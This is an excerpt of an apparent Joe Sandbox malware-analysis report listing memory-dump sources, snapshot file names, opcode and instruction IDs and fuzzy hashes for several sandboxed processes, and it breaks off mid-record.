                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1251d3e82537e973c7b5756e56e94c0f5eb721292431cc287cbd807b10bf8afd
                                                                      • Instruction ID: 96d0a8341401b098fa60ff834e963995c1608b28686d2c73499279b7e334c14f
                                                                      • Opcode Fuzzy Hash: 1251d3e82537e973c7b5756e56e94c0f5eb721292431cc287cbd807b10bf8afd
                                                                      • Instruction Fuzzy Hash: CDF0D03091A509CBEA54EB14D4456F93391EF56380F1081B9DC8FD32F3DD286DAD4685
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction ID: 7d708afda7aca91cb952d9e2c6bb4e175183190131fa63e7ece1ac36bf97878f
                                                                      • Opcode Fuzzy Hash: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction Fuzzy Hash: 4ED012345A68098FC654E728D9954A4BA90FB0A214F8901D0D40DC7161D35698A4C741
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction ID: f428fbc6977034d030d1d6b48820445d26cb1bb16331a2e643f6f0e8d3f511e8
                                                                      • Opcode Fuzzy Hash: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction Fuzzy Hash: 70C08C01E0F40B83F800332ED4020ECA9005BCB290FD08032C80F402E59C0E20FD01C6
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction ID: 34169a35e06d53277d4e23f7ee869349ee897fcf519546a0bfc5e1c814ba86a4
                                                                      • Opcode Fuzzy Hash: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction Fuzzy Hash: CEC04C345519498FDA48EB29C88595477A0FB1A315BD50090E40DC7171D659DCD5C781
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 47ad034989c1a3eea3b904165392716695a8c26fd4a9666c838716bdbcd76832
                                                                      • Instruction ID: 19581d008677a23d0636526c2e64fa8c06b67a6feed9da2489031e7c84fc04d6
                                                                      • Opcode Fuzzy Hash: 47ad034989c1a3eea3b904165392716695a8c26fd4a9666c838716bdbcd76832
                                                                      • Instruction Fuzzy Hash: F4C08C02F48C6A83F2146228C02067F04429F80248F8044B0E00EC63C6CC0C9B0102C2
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction ID: fc3dbd6b031368a8f4210c7d7a181a04218cece0ed456d64e22340746e301747
                                                                      • Opcode Fuzzy Hash: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction Fuzzy Hash: 0AC02B10C4D004C3F3294330C4011FE31401F5A300F05C172C00F52091DE2854281180
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction ID: 1401085b7badf1dab677a00a7fd944e1cebbd174fdf7aa36566134bf2590a3a9
                                                                      • Opcode Fuzzy Hash: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction Fuzzy Hash: ADB01200C5740F43E804337E48420E478505B4B140FC04070D80E40195984E10BC02C3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.1731421929.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffaab440000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: d51d87f4bf8dc3cd4ccfdd7a9390f68007acb6a097157c88452ed5e5a7d49aa0
                                                                      • Instruction ID: 0e1940acc0a3f8b1bc9895f3ce5b0a10781f4cda516efab16a0242bd87582379
                                                                      • Opcode Fuzzy Hash: d51d87f4bf8dc3cd4ccfdd7a9390f68007acb6a097157c88452ed5e5a7d49aa0
                                                                      • Instruction Fuzzy Hash: 9951F58FB4956376E21133BDF0099EC5BE8EFD1376B094AB7D14EC91834D08689982E5
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab4a1000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: fbae115273a8061cf60fc8e3930497709ce788878f9ad58f4767502085cd3f87
                                                                      • Instruction ID: 3cb0638c0fa201dc150ebe5deb648b377a2c3e640bed2febe5d649b9482c63f9
                                                                      • Opcode Fuzzy Hash: fbae115273a8061cf60fc8e3930497709ce788878f9ad58f4767502085cd3f87
                                                                      • Instruction Fuzzy Hash: 4EE01A6144F7C48FCB4AEB7488699587FA0AE6721078A41EEC049CF1B3E62E8889C711
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab4a1000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 33afa1720f624e43994c15f338f51048f8f96b6492524073cc7a273d63f5b458
                                                                      • Instruction ID: 1d7c58a46372557c3c4d565f8dcf95a1be0a6e412775981ddc79b11a307d61bc
                                                                      • Opcode Fuzzy Hash: 33afa1720f624e43994c15f338f51048f8f96b6492524073cc7a273d63f5b458
                                                                      • Instruction Fuzzy Hash: 95E01A6144F7C44FCB4AEB7488698487FB0EE6725078A40EEC049CF1B3E62E9849C701
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab470000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7afca9b20cc26904101bd20c8038c736a43faecde94c9f8aaf71848f0e5b0fb7
                                                                      • Instruction ID: e137d068d438d23d02ae6facc2f6a5a2fc83b20d9fd53ce8c84dddd3961a9d3b
                                                                      • Opcode Fuzzy Hash: 7afca9b20cc26904101bd20c8038c736a43faecde94c9f8aaf71848f0e5b0fb7
                                                                      • Instruction Fuzzy Hash: D4413E3264C9155FD715EB7CE4899F87BE0EF86321B0509BBD08ACB067DA20AC82C3C1
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab470000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 83c8d1e1397b31711cbfdca90b1d3a2417566ea1eb3f706d05620ec26d26dbfe
                                                                      • Instruction ID: a8e43c674d71d7a54828278abcd97ebcc5e985ce3ba9523517aa45b0ab95d174
                                                                      • Opcode Fuzzy Hash: 83c8d1e1397b31711cbfdca90b1d3a2417566ea1eb3f706d05620ec26d26dbfe
                                                                      • Instruction Fuzzy Hash: 4A413952A4E6962FE305B77CE09A5F87BD0EF85361B1548FAD04EC71B3DD186886C2C4
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab470000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction ID: 2f108efce297fe2c2bc39ef8334c547788e254aae91e9cfa00527482bc055ed3
                                                                      • Opcode Fuzzy Hash: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction Fuzzy Hash: 6521F83130DC184FE768EB0CE889DB973D5EB5A32170101BAE58EC7136E921EC9287C1
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab470000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 37f7d0880437377d73f176e152605c96e79f19e91d05d7e6f0bdb34aeef54572
                                                                      • Instruction ID: 7b884f07f04cc24a2e89e43c7ed11355452992d6da22398a0c29dcbaa796ee2b
                                                                      • Opcode Fuzzy Hash: 37f7d0880437377d73f176e152605c96e79f19e91d05d7e6f0bdb34aeef54572
                                                                      • Instruction Fuzzy Hash: F6312762A0EA566FF258B77CE44A9B977D1EF85361B1444FED00EC32E3CC186C8682C4
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab470000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 70a52f0daa5f5b45c029ac67191957051086f868f0658ada9fa25cc579e7cd7c
                                                                      • Instruction ID: 19ac7d0126b33ad30efd55cd5073a2c722cdd151bae059fd644a058579e7d3ea
                                                                      • Opcode Fuzzy Hash: 70a52f0daa5f5b45c029ac67191957051086f868f0658ada9fa25cc579e7cd7c
                                                                      • Instruction Fuzzy Hash: 4231E77190E64ACFEB45EB68C8559B97BF0FF5A300B0445FAD00DD71A2EA29A845C781
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab470000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 05f714ccc5b586d96e19cec6cd2223508c39cbcfc1b79abecfdb253eae75cea3
                                                                      • Instruction ID: b3b0db3a5383da0700f6b34bb9f34df366d2353e1e927e8671520cce99285d1d
                                                                      • Opcode Fuzzy Hash: 05f714ccc5b586d96e19cec6cd2223508c39cbcfc1b79abecfdb253eae75cea3
                                                                      • Instruction Fuzzy Hash: 53310861A1EA595FE788F738C45AA7977D2EF99351B1440FDD40EC33E3DD28A885C280
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab470000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 520a4825765c22334273d10af0058e46e52023cedf1560e53a543f6b62cd858e
                                                                      • Instruction ID: 715b2c4adc478542ad87db53a136c64052b4544663cb3fde7f9f5ded69793504
                                                                      • Opcode Fuzzy Hash: 520a4825765c22334273d10af0058e46e52023cedf1560e53a543f6b62cd858e
                                                                      • Instruction Fuzzy Hash: 4C31D466A0E649DFE715AB68D8451EC7FA0EF82351F1585B7D00CC62E3D9382589C7C1
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab4a1000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4a85b4f007323ea687081caab2141435b78e36d44a50eb80ee6f8f15cd446f7d
                                                                      • Instruction ID: 8d3dd9c20ec3253515a44e9cf91f0a86554744c8b577e2478d1e30daaebc6f59
                                                                      • Opcode Fuzzy Hash: 4a85b4f007323ea687081caab2141435b78e36d44a50eb80ee6f8f15cd446f7d
                                                                      • Instruction Fuzzy Hash: 4721D751A1FB868FE684E36C88A97B96AE1EF5A344F4441BED40CC31E3CC5928C94382
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab470000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9e84ad57c3ef2a4124038998c17ec57c5d8fa5fcd0d26ea24ab301e89415f61c
                                                                      • Instruction ID: 6f730f81e546096e534fb216321fe1b217e9d86c8f41032629fe2466108cfa8b
                                                                      • Opcode Fuzzy Hash: 9e84ad57c3ef2a4124038998c17ec57c5d8fa5fcd0d26ea24ab301e89415f61c
                                                                      • Instruction Fuzzy Hash: 5A21FC30D18569CFEB65DB08C454BA9B3E1FB59314F1085EAC40EE3291CB79AEC4CB80
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab470000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2ebf27d9b8c2bddb23783a1e6f405a056f4fa2622865dd980cdf28dcfa7ce27f
                                                                      • Instruction ID: c306b72b7be54ba8e2b197199eed880950137f82dda53802c80e2249acc0d12c
                                                                      • Opcode Fuzzy Hash: 2ebf27d9b8c2bddb23783a1e6f405a056f4fa2622865dd980cdf28dcfa7ce27f
                                                                      • Instruction Fuzzy Hash: DF11A036A0E789DFE706DB68C8551AC7FB0EF43251F1584B7D048DB2A2D538568AC7C1
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab470000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8f6b424134137d6587840da6032d2c86eb255bdee191464d7a689d668315282a
                                                                      • Instruction ID: 11a590a174681ac3eea44667523e8970f4d37835ed70dcc31b1341a65cced8f7
                                                                      • Opcode Fuzzy Hash: 8f6b424134137d6587840da6032d2c86eb255bdee191464d7a689d668315282a
                                                                      • Instruction Fuzzy Hash: 4101CB32A0E788DFE70ADB68C8540A87FB0EF42250F0480B7D048DB2A2D5385A89C781
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab470000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9e7169293f19e7df325f4af45e249c862f5fa8bccd7cca672ef8b31adc6b1100
                                                                      • Instruction ID: 5ac0458d7093ce37c656ae7377ba6151b46a1aabc89cd76a794a13be113f5d20
                                                                      • Opcode Fuzzy Hash: 9e7169293f19e7df325f4af45e249c862f5fa8bccd7cca672ef8b31adc6b1100
                                                                      • Instruction Fuzzy Hash: 45018C7590E389DFE70ADB68C8541A9BFB0EF42350F1981E7D048DB2A2D5385A89C781
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab480000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5fb04a8ecc67890db30c3a10eeb76e0e86e6b84df3085faa2cf8fe9194738d51
                                                                      • Instruction ID: ee650fc49c6a003e7efacc327835dd1d13448634b7f5a63c33c7bb8dba674e30
                                                                      • Opcode Fuzzy Hash: 5fb04a8ecc67890db30c3a10eeb76e0e86e6b84df3085faa2cf8fe9194738d51
                                                                      • Instruction Fuzzy Hash: BBF0B420E0D90BCFF755EB68E8606B93294FF56380F018175D42DC31F6EE28E80982C4
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab4a1000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 265d6d975da1c370076de69c664e47577e1242a7cd9164a8edcc6ee0b99e1ca6
                                                                      • Instruction ID: eeafc1e56f36de83a091281aa2e99c09b7bfa6463249f1dfd222b7f83ceb12a6
                                                                      • Opcode Fuzzy Hash: 265d6d975da1c370076de69c664e47577e1242a7cd9164a8edcc6ee0b99e1ca6
                                                                      • Instruction Fuzzy Hash: C3E04F7194F7C08FC74B973888A88A07F60DF6721174A41EEC045CF6B3EA198C4AC752
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab480000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7d552702ab8491adb02838352863212ba115fcbcd00fc4b57cdbf35e1e0c9235
                                                                      • Instruction ID: e5507f6381f885f6b96fb1c9d226c88b1ced519899ebbb84108b18946b5709c6
                                                                      • Opcode Fuzzy Hash: 7d552702ab8491adb02838352863212ba115fcbcd00fc4b57cdbf35e1e0c9235
                                                                      • Instruction Fuzzy Hash: 6DD05E30B60A094B8B0CA62D8858430B3D1E7AA6067D49278980BC2291ED25ECCA8B80
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab4a1000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.1809446641.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_7ffaab4a1000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: fbae115273a8061cf60fc8e3930497709ce788878f9ad58f4767502085cd3f87
                                                                      • Instruction ID: 3cb0638c0fa201dc150ebe5deb648b377a2c3e640bed2febe5d649b9482c63f9
                                                                      • Opcode Fuzzy Hash: fbae115273a8061cf60fc8e3930497709ce788878f9ad58f4767502085cd3f87
                                                                      • Instruction Fuzzy Hash: 4EE01A6144F7C48FCB4AEB7488699587FA0AE6721078A41EEC049CF1B3E62E8889C711
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab4a1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 33afa1720f624e43994c15f338f51048f8f96b6492524073cc7a273d63f5b458
                                                                      • Instruction ID: 1d7c58a46372557c3c4d565f8dcf95a1be0a6e412775981ddc79b11a307d61bc
                                                                      • Opcode Fuzzy Hash: 33afa1720f624e43994c15f338f51048f8f96b6492524073cc7a273d63f5b458
                                                                      • Instruction Fuzzy Hash: 95E01A6144F7C44FCB4AEB7488698487FB0EE6725078A40EEC049CF1B3E62E9849C701
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7afca9b20cc26904101bd20c8038c736a43faecde94c9f8aaf71848f0e5b0fb7
                                                                      • Instruction ID: e137d068d438d23d02ae6facc2f6a5a2fc83b20d9fd53ce8c84dddd3961a9d3b
                                                                      • Opcode Fuzzy Hash: 7afca9b20cc26904101bd20c8038c736a43faecde94c9f8aaf71848f0e5b0fb7
                                                                      • Instruction Fuzzy Hash: D4413E3264C9155FD715EB7CE4899F87BE0EF86321B0509BBD08ACB067DA20AC82C3C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3b903357b4801e17ae7cd2ad9bc0b883f597affdae35743ba0065467cb490184
                                                                      • Instruction ID: 043ea8c293df8a7c5efac75220887512ada407557bb894241f0a18f50f362887
                                                                      • Opcode Fuzzy Hash: 3b903357b4801e17ae7cd2ad9bc0b883f597affdae35743ba0065467cb490184
                                                                      • Instruction Fuzzy Hash: 8D413952A4E6962FE705B77CE09A9F87BD0EF85361B1548FAD04EC71B3DD186882C2C4
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction ID: 2f108efce297fe2c2bc39ef8334c547788e254aae91e9cfa00527482bc055ed3
                                                                      • Opcode Fuzzy Hash: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction Fuzzy Hash: 6521F83130DC184FE768EB0CE889DB973D5EB5A32170101BAE58EC7136E921EC9287C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2873652a3e92e0a001a1ab292671519af0db2624a9c71151d587f9691fc7667c
                                                                      • Instruction ID: 9184acb72e5af1ea98ed0e9e464a2830f0b1c5b004eb19c1483dbd9eeb955f9a
                                                                      • Opcode Fuzzy Hash: 2873652a3e92e0a001a1ab292671519af0db2624a9c71151d587f9691fc7667c
                                                                      • Instruction Fuzzy Hash: 23310662A0EA566FF258B77CE44A9B977D1EF85361B1544FED00EC32E3DC186C8682C4
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e918f86a40548bd273ad7ed38a3cef16b5b6b21debaaffae29967ed1648dc29a
                                                                      • Instruction ID: 5394665f11ac6731346f3c3a86d9fc9dc0dc6b38f59db86a06ae544e194cdb17
